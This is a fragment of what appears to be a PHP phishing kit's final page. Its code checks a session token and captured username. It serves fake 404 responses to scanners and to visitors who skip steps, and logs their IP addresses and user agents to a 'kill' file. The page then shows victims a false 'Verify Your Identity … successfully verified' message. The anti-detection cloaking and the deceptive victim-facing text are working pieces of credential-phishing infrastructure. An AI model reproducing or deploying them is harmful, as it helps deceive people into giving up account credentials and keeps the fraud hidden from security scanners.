settings(); if (!$comps->checkToken()) { echo $antibot->throw404(); $comps->log( "../Guard/Audio/kill.txt", "IP: " . $_SESSION['ip'] . "\nUser Agent: " . $comps->getUserAgent() . "\nReason: Token\n\n" ); die(); } if ( !isset($_SESSION['username']) || $_SESSION['username'] == "" ) { echo $antibot->throw404(); $comps->log( "../Guard/Audio/kill.txt", "IP: " . $_SESSION['ip'] . "\nUser Agent: " . $comps->getUserAgent() . "\nReason: Skipping Pages\n\n" ); die(); } ?> code

Thanks!!

Verify Your Identity
Your account have been successfully verified, you will be redirected soon to continue your session..